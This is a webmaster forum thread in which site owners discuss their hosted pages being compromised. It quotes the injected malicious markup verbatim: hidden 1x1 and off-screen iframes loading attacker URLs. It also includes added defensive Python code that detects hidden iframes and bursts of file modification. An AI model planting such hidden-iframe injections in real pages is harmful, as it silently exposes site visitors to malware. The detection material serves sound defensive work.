GoFuckYourself.com - Adult Webmaster Forum


CunningStunt 07-15-2008 08:36 PM

Anyone else had their Webair sites hacked yesterday?
 
Fucking Iframe code added to the sites by this fucking asshole.

<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

You'd better check if you're with Webair, google is flagging the sites and preventing them loading. That's 30 sites I have to manually check now. Fucking asshole hackers. :321GFY

CunningStunt 07-15-2008 10:38 PM

Just a heads-up, check your sites. I've informed their registrar.

Had to submit 6 review requests to google as the sites have been royally fucked over.

st0ned 07-15-2008 10:42 PM

Wow, thanks for the heads up. I received an email from them saying that they had to move my server due to a "PDU error", didn't think to check my sites though. Going to scan through them now.

Evil E 07-15-2008 10:44 PM

Might also have to do with you and not the host.

Did you check your logs or talk to your host?

st0ned 07-15-2008 10:47 PM

No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt

thaifan99 07-15-2008 10:51 PM

thanks for the heads up. checking now

fallenmuffin 07-15-2008 11:02 PM

Yup.. has been happening to me for months. Got every site I had on webair blocked in google (google warning pages). They just fixed it on my server I guess.. they said they enabled security :| we will see..

I have another server at www.phatservers.com and not had that issue with them.

Babaganoosh 07-15-2008 11:11 PM

Why do people still use webair? They're like the new dreamhost.

CunningStunt 07-15-2008 11:24 PM

Quote:

Originally Posted by st0ned (Post 14465167)
No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt

That's a neat tool st0ned, thanks for that.

Yeah, I hear you Babaganoosh. I've just got so many domains, and it's a pain in the ass to source a load of new hosts that accept the kind of sites we make :1orglaugh. I already deal with 16 different hosts as it is :Oh crap

jollyperv 07-16-2008 02:05 AM

Quote:

Originally Posted by st0ned (Post 14465167)

Awesome tool

CunningStunt 07-16-2008 03:05 AM

Heard nothing back from webair in 8 hours.

Great support. Not.

MMarko 07-16-2008 03:10 AM

Do you use some CMS script, or were those plain HTML pages?

CunningStunt 07-16-2008 03:45 AM

Those were straight html pages.

It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.

Dirty F 07-16-2008 03:48 AM

I've never seen a host getting so many complaints on here as Webair. Yet people always use them. Don't cry about shit if you host with Webair. You can expect shit.

tahiti 07-16-2008 03:49 AM

Quote:

Originally Posted by CunningStunt (Post 14464928)
Fucking Iframe code added to the sites by this fucking asshole.

<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

You'd better check if you're with Webair, google is flagging the sites and preventing them loading. That's 30 sites I have to manually check now. Fucking asshole hackers. :321GFY

"Fucking asshole hackers." I'd say fucking bad admins! If there were better admins, there would be fewer hackers.

potter 07-16-2008 03:50 AM

Quote:

Originally Posted by CunningStunt (Post 14465594)
It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.

Wow. Goes to show how much you know about web applications and scripting. :error

CunningStunt 07-16-2008 03:51 AM

This is the first problem I've had with Webair in 6 years, so you're talking shit as usual Troll boy. I thought you'd been banned permanently once and for all Frank?

CunningStunt 07-16-2008 03:53 AM

Quote:

Originally Posted by potter (Post 14465601)
Wow. Goes to show how much you know about web applications and scripting. :error

How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?

nico-t 07-16-2008 03:59 AM

Webair is one of the few hosts I avoid like the plague, about 1 thread a week about them.

potter 07-16-2008 04:02 AM

Quote:

Originally Posted by CunningStunt (Post 14465607)
How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?

There are dozens of ways to gain access. They can hack a php or similar script running on your website. They can hack the server itself. They can hack the local network the server is located on. etc etc etc. Ten times out of ten it's a poorly written php script which is easily attacked to give the hacker access to the server files.

Seriously dude. Webmaster 101. You should know this shit already. Especially if you have your own dedi box.

CunningStunt 07-16-2008 04:08 AM

Thanks for the info potter, but they are basic sites, just html, handwritten, nothing running on them. No scripts to exploit.

I'm not a server guy. I write sites, and expect whoever hosts them to fucking do their job and look after them. I don't expect to have to look after server security as well as know how to SEO a site to beat 40 million others to a #1 keyphrase.

xentech 07-16-2008 04:24 AM

Quote:

Originally Posted by CunningStunt (Post 14465594)
Those were straight html pages.

It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.

:1orglaugh:1orglaugh:1orglaugh

Violetta 07-16-2008 04:37 AM

hmm... somebody complained about a site I posted last night! Gonna double check now!

Dirty F 07-16-2008 01:50 PM

Quote:

Originally Posted by Rockatansky (Post 14465660)
hmm... somebody complained about a site I posted last night! Gonna double check now!

Yeah that was me. No virus but it just sucked.

pocketkangaroo 05-13-2009 05:45 PM

Anyone getting these again? Have a small virtual host account that has had all the sites hit. Running no scripts on any of these sites, they are strictly html.

HorseShit 05-13-2009 06:09 PM

lollllllllllllllll

Cyber Fucker 05-13-2009 06:09 PM

Nope, my box was fine and it is fine now too :2 cents:

spacedog 05-13-2009 06:59 PM

Quote:

Originally Posted by pocketkangaroo (Post 15850240)
Anyone getting these again? Have a small virtual host account that has had all the sites hit. Running no scripts on any of these sites, they are strictly html.

You should run your antivirus scan on your machine if you loaded your own site and it had the iframes on your pages since those iframes load a virus which attacks SVCHOST.exe on your local machine and consequently corrupts your system32 files

Shoplifter 05-13-2009 07:01 PM

Quote:

Originally Posted by fallenmuffin (Post 14465198)
Yup.. has been happening to me for months. Got every site I had on webair blocked in google (google warning pages). They just fixed it on my server I guess.. they said they enabled security :| we will see..

I have another server at www.phatservers.com and not had that issue with them.

Are you using AT3?

pocketkangaroo 05-13-2009 07:20 PM

Quote:

Originally Posted by spacedog (Post 15850410)
You should run your antivirus scan on your machine if you loaded your own site and it had the iframes on your pages since those iframes load a virus which attacks SVCHOST.exe on your local machine and consequently corrupts your system32 files

Computer is clean. Haven't uploaded anything new in ages to the server. This actually wasn't an iframe being added but some javascript.

NaughtyRob 05-13-2009 08:15 PM

I am not with webair but had mine hacked yes. iframe but different code.

collegeboobies 05-13-2009 08:28 PM

Quote:

Originally Posted by CunningStunt (Post 14465607)
How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?

there are a shitload of exploits for most well known scripts people use

notoldschool 05-13-2009 09:08 PM

Quote:

Originally Posted by pocketkangaroo (Post 15850462)
Computer is clean. Haven't uploaded anything new in ages to the server. This actually wasn't an iframe being added but some javascript.

I had 5 boxes hit with a superlong javascript on hundreds of domains. Any clue what the javascript does other than fuck up your page?

mynameisjim 05-13-2009 09:46 PM

Quote:

Originally Posted by notoldschool (Post 15850683)
I had 5 boxes hit with a superlong javascript on hundreds of domains. Any clue what the javascript does other than fuck up your page?

Can either be a simple redirect or a trojan installer.

Major (Tom) 05-13-2009 10:40 PM

Quote:

Originally Posted by st0ned (Post 14465167)
No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt

It's probably not the host. We had the same thing happen to us on one of our blogs and the guy who updates them had a virus. Only the blogs he updates got slammed.

Duke

notoldschool 05-14-2009 05:32 AM

this is the first part of the pop you get from the virus that has infected webair servers.
ijabwif.com/cgi-bin

Some boxes with Norton catch the virus and some don't.
Webair is being VERY quiet about this for some reason.

VladS 05-14-2009 05:50 AM

All of my sites have been infected with a piece of js code on all the index files. The sites are on four different hosting accounts, the FTP passwords are not the same.

Yeah, basically I'm fubar. I'm expecting Google to take notice and ban the sites, and if that happens, well...

I don't quite understand how they got in on four different hosting accounts. Judging by the FTP logs, it seems it was some sort of script that inserted this code, because all files on all hosting accounts have been changed at the same exact time. 9.05.2009 - 12:24.

The hosts cleaned the sites, but a few days later, I've been hit again. It seems it is something on my PC that is causing this.
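
The "all files changed at the same time" observation above can be checked directly on a webroot. The following is an added example, not part of any post in this thread: it clusters web files by modification time and reports bursts. The function names, thresholds and the sample tree (built in a temp directory with constructed timestamps) are assumptions.

```python
import os
import tempfile
from datetime import datetime, timezone

WEB_EXTS = (".html", ".htm", ".php", ".js")


def modification_bursts(root, gap=60, min_files=5):
    """Return (first_mtime, last_mtime, paths) for each run of >= min_files web
    files whose modification times are chained by gaps of <= gap seconds."""
    stamped = sorted(
        (os.stat(os.path.join(d, f)).st_mtime, os.path.join(d, f))
        for d, _dirs, files in os.walk(root)
        for f in files
        if f.lower().endswith(WEB_EXTS)
    )
    clusters, current = [], []
    for mtime, path in stamped:
        if current and mtime - current[-1][0] > gap:
            clusters.append(current)
            current = []
        current.append((mtime, path))
    if current:
        clusters.append(current)
    return [(c[0][0], c[-1][0], [p for _, p in c]) for c in clusters if len(c) >= min_files]


def build_constructed_tree(root):
    """Constructed sample: 3 sites, old pages plus files touched within seconds."""
    burst = datetime(2009, 5, 9, 12, 24, tzinfo=timezone.utc).timestamp()
    for i in range(3):
        site = os.path.join(root, f"site{i}")
        os.makedirs(site)
        for j, name in enumerate(("index.html", "tour.html", "about.html")):
            path = os.path.join(site, name)
            open(path, "w").close()
            # about.html keeps an old mtime; the other two fall inside the burst
            mtime = burst + i * 3 + j if name != "about.html" else burst - 86400 * (30 + i)
            os.utime(path, (mtime, mtime))


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_tree(tmp)
        for first, last, paths in modification_bursts(tmp):
            print(datetime.fromtimestamp(first, timezone.utc), len(paths), "files")
```

A legitimate bulk upload produces the same kind of burst, so a hit is a lead to compare against FTP login times, not proof of tampering.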

V_RocKs 05-14-2009 05:59 AM

Your PC? Highly unlikely...

VladS 05-14-2009 06:01 AM

This is the first code that was injected on my sites: (decoded version)

Code:

<iframe width="480" height="60" src="http://download-123.cn/vtiadmin2/t.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

The FTP logs:

Quote:

CyberWurx login monitoring has detected the following account login from a new internet segment:

Date: Sat May 9 05:24:25 2009

FTP Logged in from:
Country: United States
Internet segment: 65.64.0.0/13
Internet Service Provider: SBIS-AS - SBC Internet Services

Quote:

CyberWurx login monitoring has detected the following account login from a new internet segment:

Date: Sun May 10 23:54:24 2009

FTP Logged in from:
Country: Germany
Internet segment: 81.169.144.0/20
Internet Service Provider: STRATO Strato AG
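
A static check for the two injection patterns quoted in this thread (the 1x1 visibility:hidden frame and the off-screen opacity:0 frame), as an added example that is not part of any post here. The sample page and its .example hosts are constructed, and the hiding heuristics are assumptions rather than a complete list.

```python
import re
from html.parser import HTMLParser

# Inline-style fragments that hide a frame from the visitor (heuristics, assumed).
HIDING_STYLE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|opacity\s*:\s*0(?![.\d])"
    r"|(?:left|top)\s*:\s*-\d{2,}",
    re.I,
)


def _tiny(value):
    """True for a width/height attribute of 0 to 2 pixels."""
    m = re.fullmatch(r"\s*(\d+)(?:px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 2


class HiddenFrameFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # list of (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny dimensions")
        if HIDING_STYLE.search(a.get("style") or ""):
            reasons.append("hiding style")
        if reasons:
            self.findings.append((a.get("src"), reasons))


def find_hidden_iframes(html):
    finder = HiddenFrameFinder()
    finder.feed(html)
    return finder.findings


# Constructed page: two injected frames shaped like those quoted above, one normal embed.
SAMPLE_PAGE = """<html><body><h1>Gallery</h1>
<iframe src="http://injected.example/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe width="480" height="60" src="http://injected.example/t.php" style="border:0px; top:0px; left:-500px; opacity:0"></iframe>
<iframe src="https://player.example/embed/1" width="640" height="360" style="border:0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_PAGE):
        print(src, "->", ", ".join(reasons))
```

A static scan only sees frames present in the served markup; the script-injected variant reported later in the thread needs a fetch that renders the page, like the tool st0ned links.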

seeandsee 05-14-2009 06:14 AM

HI


fucked shit


All times are GMT -7.
